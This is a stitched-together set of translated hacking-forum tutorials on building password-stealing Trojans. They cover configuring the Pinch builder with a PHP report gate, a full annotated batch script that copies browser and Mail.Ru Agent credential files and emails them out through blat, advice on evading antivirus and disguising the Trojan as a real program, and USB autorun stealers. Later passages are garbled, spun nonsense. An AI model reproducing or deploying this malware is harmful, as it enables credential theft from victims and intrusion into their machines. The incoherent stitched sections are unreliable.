How to write a Trojan program that steals passwords. We create a Trojan to steal passwords. Instructions for creating a Trojan to steal passwords

People!!!
Now I will tell you how to create your own Trojan virus (almost your own)!

What you need:
brains - 1 pc., computer - 1 pc., Internet access - 1 pc., Pinch (builder) - 1 pc., server (for Trojan reports) - 1 pc., Parser (for decrypting reports).

Perhaps that's all...

Now, as always, a short story.

Trojans
..they were known about 33 centuries ago

In the 12th century BC. Greece declared war on the city of Troy.
The conflict arose when a Trojan prince kidnapped Queen Helen of Sparta and announced that he wanted to make her his wife. This naturally angered the Greeks, especially the king of Sparta. The Greeks besieged Troy for 10 years, but without success, because... Troy was well fortified.
In a last effort, the Greek army pretended to retreat and left behind a huge wooden horse. The Trojans saw the horse and, thinking that it was a gift from the Greeks, dragged the horse into the city, not realizing that the best Greek soldiers were sitting inside the empty wooden horse.
Under the cover of darkness, the soldiers got out, opened the gates of the city and later, together with the remaining army, killed the entire Trojan army. Like a wooden horse, the program
The Trojan horse pretends to do one thing, but in fact does something completely different.

Alexey Demchenko - Russian Kul Khatsker is also known as “aka coban2k”
The author of many programs, and his best (in my opinion) program is PINCH, the most common Trojan on the Internet! Knows many programming languages ​​in particular: C++, Pascal, Delphi, MySQL, PHP, XML and many others. In general, I advise you to go to his personal website www.cobans.net, there you will find some information about him.

In particular, we are considering the Pinch program (Pinch 2.58)
Pinch 2.58 is a Builder, a Trojan virus compiler... because... in the builder you will attack certain functions of the Trojan... for example: steal passwords from ICQ, TheBat, FAT, browser cookies (this is the most popular).
BUT that’s not all Pinch can also: create/edit a certain parameter in the Registry, delete itself after completion of work, create a “Blue Screen of Death”, or even better, create a server (console) on the victim’s computer (BackDoor), after which the victim’s computer it is your property (literally). You can carry out DDOS attacks through his computer through his IP address, and at this moment maintain your anonymous sovereignty.
Just don’t think that you can only have one computer at your disposal. You can have as many of them as you want, but this is already called BotNet...

Well, that's all, let's start...

See what the Pinch Builder looks like below:

Figure 1.1

Added after 55 seconds
Now I’ll explain how Trojan works...

1. You can compile the Trojan so that reports are sent to the e-mail you specified. But they can burn you (that is, your Trojan) because... your victim may have SP2 (Windows XP Service Pack 2)) which means FireWall also has... FireWall will never turn on (without your permission) port 25 (SMTP) which means your Troy will not be able to send the victim’s report to E-mail. (such well-known mailers as mail.ru, yandex.ru, etc. do not receive reports) Use the mailer http://goolook.ru But still, I do not recommend using SMTP!

2. You can compile the Trojan so that reports are sent to the server you specify.
It's safer because at the time of sending the report, Pinch manifests itself as:
Process name: iexplorer.exe
Protocol: http
Remote address: www.YOUR_SERVER.xxx/get.php
FireWall cannot prevent the “iexplorer.exe” process (and if it could, you wouldn’t see anything on your computer monitor (except for the desktop picture))
Protocol: http:// means port “80” (NO COMMENTS)

So, today we will look at “2nd”, I already said yes (?) that this is better.

Let's look at more races at Builder >>>

Figure 1.1

1. Click on the “HTTP” tab and select the “HTTP” protocol.

2. In the URL field, enter the address of your website (server), for example: http://kuzia_lox.jino-net.ru/mailp_p/mail.php
We will focus on this in more detail...
In order for Pinch to send you reports via http://, you need a server (let’s simply call it a “site”) and so you need a site WHICH PHP SCRIPTS MUST MANDATORY WORK!!! The best of them is http://jino-net.ru
True, I said that there is also http://onepage.ru/ but the server was destroyed.
Let's continue...
So, register on http://jino-net.ru under any domain and any password J).
Have you registered?
I think yes…
Let's continue...
Let's say you registered under the domain http://petia_lox.jino-net.ru
We go to the FTP of your site. Do you know what FTP is? Ehhhh... I'll have to tell you, because I remember myself...
FTP is the content of your site... that is, using the FTP protocol (port 21), you get to the root of your site where different directories/folders/files, etc. are contained.

Let’s go to Google.ru and download the “CuteFTP” program... Perhaps I’ll do it for you.
Let's go here >>>
http://www.google.ru/search?hl=ru&q=CuteFTP+download&btnG=Search+in+Google&lr=
I like the 4th link better.
Download CuteFTP 7.1 + Russifier
Let's go >>>
http://gizmodo.ru/2005/07/23/skachat_cuteftp_7_1__rusifikator/
I think next you will figure out how to download the program and how to install it.

Added after 1 minute
Downloaded, installed, Russified... let's continue...

Now go to your site's FTP. Go to the /docs/ folder, create any folder in this folder, for example “mail_p”, give this folder the rights CHMOD 777 (right-click on the folder in the context menu, find the “CHMOD” or “Properties” parameter in different versions of the CuteFTP program, different translations)
Now upload the get into this folder (mail_p). What is a get?
“Get” this gate script for receiving reports from pinch has the extension “.php”
You can get it here >>>
http://pinch3.ru/other/gate.txt
Create a Notepad text file on your computer and copy the gate text
http://pinch3.ru/other/gate.txt<<< в свой текстовый фаил >>> give the extension to the text file.php (it used to be .txt)

The script is ready, rename it “mail” and upload it to the FTP of your website in the folder /docs/mail_p/
And give CHMOD rights to this file 777.

Remember this place, now reports will be sent to this folder where the get is located (/docs/mail_p/).

So we write in the URL field (in the builder if you haven’t forgotten yet)
http://petia_lox.jino-net.ru/mail_p/mail.php (you have your own address)

3. Let's look >>>

Figure 1.2

Make all the checkboxes like I have in Figure 1.2
Do not check the box above the “Opera” parameter, otherwise the report will not be decrypted (read below).

You can already compile... but we will also look at other additional (although they are sometimes even required) functions...

“PWD” tab we already know what it is)
The “Run” tab is for ummmm, let’s say, to improve Pinch’s intelligence, that is, for deleting itself, for saving your .dlls in Windows and much more.
Spy tab. Send a screenshot of the victim’s monitor to save IE KeyLog, etc.
“NET” tab for PHP console commands notify/ I don’t know the rest...
My beloved BegDor has never used the “BD” tab from Pinch’a...
The “etc” tab for compressing the Trojan, for changing the Trojan icon.
“Kill” tab for killing any processes (for example FireWall)
“IE” tab: manage IE, add a site to favorites, follow a link.
I don’t know the “Worm” tab... something to do with DNSsecs.
The “IRC-bot” tab is basically for the bottrack. BOTNET rules)!!!

Return to the PWD tab and click the button (bottom) “COMPILE”

HOORAY!!! TROJAN IS READY!!!

In this article I will describe how quickly and without much difficulty you can write and make a virus that steals files with passwords and sends it all to your mailbox.
Let's start with the fact that the virus will be written in bat"e (CMD, you can take the basic commands) that is, in a regular text file and will be executed using the standard built-in Windows interpreter - the "command line".
In order to write such a virus, you need to know the exact storage location of the files that it will steal, Blat components that can be downloaded from the off-site http://www.blat.net/ or from our server, as well as a component from the WinRaR archiver Rar.exe (you can do without it).
Open notepad and copy the following code there:

@echo off md %systemroot%\wincs md %SystemDrive%\pass\ md %SystemDrive%\pass\opera\ md %SystemDrive%\pass\Mozilla\ md %SystemDrive%\pass\MailAgent\ md %SystemDrive%\pass\ MailAgent\reg attrib %systemroot%\wincs +h +s +r attrib %SystemDrive%\pass +h +s +r copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" copy /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" copy /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib" CD /D % APPDATA%\Opera\Opera\ copy /y wand.dat %SystemDrive%\pass\opera\wand.dat copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.da regedit.exe -ea %SystemDrive%\ pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\ magent_logins3 CD /D %APPDATA% Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul Xcopy Mra\Update\ver.txt %SystemDrive%\pass\ MailAgent /K /H /G /Q /R /S /Y >nul cd %AppData%\Mozilla\Firefox\Profiles\*.default\ copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite copy /y %Windir%\Rar.exe %SystemDrive%\pass\Rar .exe >nul del /s /q %SystemRoot%\Rar.exe %SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\ copy /y %SystemDrive%\ pass\pass.rar %systemroot%\wincs\pass.rar cd %systemroot%\wincs %systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Password ren *.rar pass.rar %systemroot%\wincs\blat.exe -body FilesPassword -to [email protected] -attach %systemroot%\wincs\pass.rar rmdir /s /q %SystemDrive%\ pass rmdir /s /q %systemroot%\wincs del /s /q %systemroot%\blat.exe del /s /q %systemroot%\blat.dll del /s /q %systemroot%\blat.lib attrib +a +s +h +r %systemroot%\wind.exe EXIT cls

I won’t write much about the code of the boot itself.
@echo off - hides the body of the batinka (so it’s not needed, but still)
md %systemroot%\wincs - creates the wincs folder in the Windows system folder, regardless of what drive it is installed on or what it is named.
md %SystemDrive%\pass\ - creates the pass folder on the disk where the Windows system is installed.
md %SystemDrive%\pass\opera\ - creates the opera folder where wand.dat and cookies4.dat from the Opera browser will be copied in the future (up to 11* versions, Opera stores its passwords in the wand.dat file)
md %SystemDrive%\pass\Mozilla\- creates a Mozilla folder where files from the Mozilla browser (cookies.sqlite, key3.db, signons.sqlite) in which passwords are stored will be copied in the future.
md %SystemDrive%\pass\MailAgent\- creates a MailAgent folder into which files containing the correspondence history and registry keys (which store passwords) from Mail Agent will be copied.
md %SystemDrive%\pass\MailAgent\reg- creates a reg folder
attrib %systemroot%\wincs +h +s +r- puts attributes on the wincs folder, thereby hiding it from view.
attrib %SystemDrive%\pass +h +s +r- the same as above.
copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe"- copies the blat.exe file from the upload location to the wincs folder
copy /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll"- copies the blat.dll file from the upload location to the wincs folder
copy /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib"- copies the blat.lib file from the upload location to the wincs folder
CD /D %APPDATA%\Opera\Opera\ - goes to the opera folder where files with passwords (and other things) for the opera are located.
copy /y wand.dat %SystemDrive%\pass\opera\wand.dat- copies the wand.dat file to the opera folder
copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.dat- copies the cookie4.dat file to the opera folder
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2- exports the registry key magent_logins2, where the password is stored, to the reg folder
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3- exports the registry key magent_logins3, where the password is stored, to the reg folder
CD /D %APPDATA% - go to the AppData folder
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul- copies the contents of the Mra\Base folder to the MailAgent folder
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul- copies the ver.txt file to the MailAgent folder
cd %AppData%\Mozilla\Firefox\Profiles\*.default\- go to the folder with the Mozilla browser profile
copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite- copies the cookies.sqlite file to the Mozilla folder
copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db- copies the key3.db file to the Mozilla folder
copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite- copies the signons.sqlite file to the Mozilla folder
copy /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul- copies the WinRar Rar.exe archiver component to the pass folder
del /s /q %SystemRoot%\Rar.exe- removes the archiver component from the Windows folder
%SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\- archive the contents of the pass folder
copy /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar copy the created archive to the wincs folder
cd %systemroot%\wincs - go to the wincs folder
%systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Password - prepares the Blat program to send the archive by specifying the data for authorization and sending the letter. Do not forget to indicate your data from the mailbox from where the letter with the archive will be sent.
ren *.rar pass.rar - just in case if the archive did not take the wrong name during the process, we will rename it again to pass.rar
%systemroot%\wincs\blat.exe -body Files Password -to [email protected] -attach %systemroot%\wincs\pass.rar- indicate to which postal address the letter will be sent and send it.
rmdir /s /q %SystemDrive%\pass- delete the pass folder
rmdir /s /q %systemroot%\wincs- delete the wincs folder
del /s /q %systemroot%\blat.exe
del /s /q %systemroot%\blat.dll- remove Blat components from the Windows folder.
del /s /q %systemroot%\blat.lib- remove Blat components from the Windows folder.
attrib +a +s +h +r %systemroot%\wind.exe- we put attributes on ourselves, thereby hiding ourselves from view.
EXIT - we complete the batinka process and exit.
cls - clear the output of any lines in the interpreter.
Copied, saved as wind.bat and compiled into exe using the Bat to exe converter program, then we put everything together, that is, we take the components of the Blat program and the WinRar archiver component (you can download) and glue them into one executable file, or with which one any program, the path for uploading all files should be %SystemRoot% or %WindowsDir% or %windir% .
As a result, we get a virus that will not be picked up by antiviruses and will send an archive with files to your email. The files that arrive by email can be decrypted using multi-password-recovery, although not all of them, but only wand.dat from the opera and then if it has not been updated to 11*versions. All other files can be decrypted by replacing them with your own.
I think we can finish here, but if you have any questions, don’t hesitate to ask.
Thank you for your attention, all the best!
©SwAp TheHackWorld.in

Hacking How to create a Trojan virus. Pinch (for lamers)

The conflict arose when a Trojan prince kidnapped Queen Helen of Sparta and announced that he wanted to make her his wife. This naturally angered the Greeks, especially the king of Sparta. The Greeks besieged Troy for 10 years, but to no avail, because... Troy was well fortified.

In a last effort, the Greek army pretended to retreat and left behind a huge wooden horse. The Trojans saw the horse and, thinking that it was a gift from the Greeks, dragged the horse into the city, not realizing that the best Greek soldiers were sitting inside the empty wooden horse.

Under the cover of darkness, the soldiers got out, opened the gates of the city and later, together with the remaining army, killed the entire Trojan army.

Notes of a young admin

A couple of days ago, one of my friends left graffiti on my contact wall with a message that he hacked my account, etc. there was a link to the site vk-****.msk.ru. Well, yes. Of course.) I immediately wrote to him to get him treated and change his password. But the link still interested me, although I knew for sure that it was a Trojan (that’s what interested me). I decided to follow this link. As a result, I was offered to download a program that supposedly takes advantage of a recently discovered contact vulnerability and allows you to hack any account.

Instructions for creating a Trojan to steal passwords

A short guide to stealing money from online banking Hacking Territory: HackZona December 28, 2010 All about creating websites, blogs, forums, online stores, promoting them in Whether it is necessary to use some kind of Trojan for this, I don’t know. my home passwords are super complex, so I hope they can be cracked. originally from Ukraine (registration, reviews and opportunities of Likpay) Creating a Trojan to steal passwords! — YouTube November 1, 2012 if you don’t understand, write to Skype: comrad714 name of the program UFR stealer 3.0.1.0.

How to create a Trojan

Get ready, we have to write two programs at once. One will be on your machine (client), the other will need to be thrown to the victim (server). There will be a lot of work, so fewer words, and closer to the body.

So, launch Delphi or if you already have it running, then create a new project (“File” – “New Application”). Now we will get down to the server part of the Trojan.

Here you should move “From1” from the “Auto-Create forms” section (list on the left) to “Available forms” (list on the right), as I did.

How to create a Trojan

I think every reader knows the origin and meaning of the saying “Trojan horse”. The principle of operation of the Trojan virus is approximately the same (which is why it got its name). There are many types of this virus, today I will focus on one of the options for creating a Trojan program based on the developments of Alexey Demchenko or, as he is also called, “aka coban2k”, who is the author of a huge number of programs, including PINCH, which has become the most a common Trojan on the World Wide Web!

How to create a Trojan program.

We made Trojans and now we are also making a Trojan to steal passwords!

Here I will tell you how to make a simple Trojan to steal passwords from ICQ, Vkontakte, Odnoklassniki, Mail. etc. 3A%2F%2Fs61.ucoz.net%2Fsm%2F6%2Fsmile.gif&hash=1b9ff09e365c561776d64317149701b5″ /%

Now open the file “1.bat” with notepad. and change the words “Login” to your login from Yandex mail. and change the word “Password” to your Yandex mail password.

We wait. download complete.

We create a Trojan that steals all passwords from browsers (as promised)

So first we need to download the UFR stealer program, this can be done on the official website vazonez.com or via the link >> http://rghost.ru/55883641

Then we go to “build options” and click change icon so that our Trojan looks like a real program, or click merge files (it’s better for the victim to launch the program with which the trojan was glued together, and together with the program the Trojan itself)

Creating a Trojan to Steal Passwords

The virus's operating plan is as follows: it is launched, it scans all folders on the PC and copies the necessary files (by mask, for example, *.txt. pass*, etc.) to a flash drive.

Enables an extended command processing mode, i.e., it allows complex constructions such as two commands in one condition and others. Don’t laugh, because for Batch this is very cool.

Next, you need to remember the path to the directory from where the batch file was launched (we must copy the data to our flash drive, and not to some hard drive) because the code that comes next confuses the value of the CD variable (current working folder).

At the end of the Trojan's work, it will create a ready.txt file so that we know that it has finished working (we will make the Trojan invisible, without a console).

Trojan for stealing VKontakte password, download installer

In one column, a Trojan for stealing a password in Contact blocks the game on PS3. To steal the password, the Trojan takes into account the geographic coordinates of the owner to steal the recognized material. Taking into account user actions, the password Trojan allows you to personalize the display for communication in the system.

For communication, password trojans and automatic negotiation provide state-of-the-art creation tools.

Trojan for password theft

Just like office work, it provides easy navigation in the form of a virtual disk. Active Control announces the release of a product for working with bookmarks. Linear space defines their exact location to prevent acquisition.

Power Batch is looking for a help topic for limiting traffic. The rather large size at the bakery allows you to display reports. By holding down the keys to cool down, the password stealing Trojan, like individual editing, involves complete data transfer.

Trojans #9

Antivirus Stealer - unzip this program, copy 2 files and a folder to a flash drive (Antivirus.bat,autorun.inf,prog) and you can go with your friends with the flash drive! You insert the flash drive into the computer, click Antivirus.bat, when it stops you can close it and take out the flash drive, all the passwords that you have on your computer on the flash drive, they will be stored in the “prog” -> “log” folder.

Here I will tell you how to make a simple Trojan to steal passwords from ICQ, Vkontakte, Odnoklassniki, Mail... etc., etc....
Let's get started... first we need some programs:
Multi Password Recovery is a utility for recovering forgotten passwords
blat is an email client.
Bat to Exe converter - bat-exe format converter.
You can download all this in one archive:

You must be registered to see links.

Download and unpack into a separate folder...
Now open the file "1.bat" with notepad... and change the words "Login" to your login from Yandex mail... and change the word "Password" to your password from Yandex mail...

Save and close...
Now open "Bat_To_Exe_Converter"...
In the "Batch file" field, indicate the file you saved "1.bat"
The "Save as" field cannot be changed...
Set the settings as shown below:

Now let's go to the "Include" tab...
And transfer there all the files from the "blat" and "MPR..." folders.

There should be exactly seven of them!!! As shown above!!!
Well, now let’s add an icon to our Trojan... this is not necessary, but it looks more like some kind of program...
Go to the "Versioninformations" tab and in the "Icon fie" field select the icon....
Click "Compile"...
We are waiting... for the download to complete... and check the folder with the file "1.bat"... your Trojan "1.exe" should have appeared there (You can call it whatever you like

)...
Well, now let’s check... launch the Trojan on our computer and wait... in 30 seconds... a file will be sent to your email... download it (passwords are stored in it)
Downloaded... now we launch it through "MPR" and admire the passwords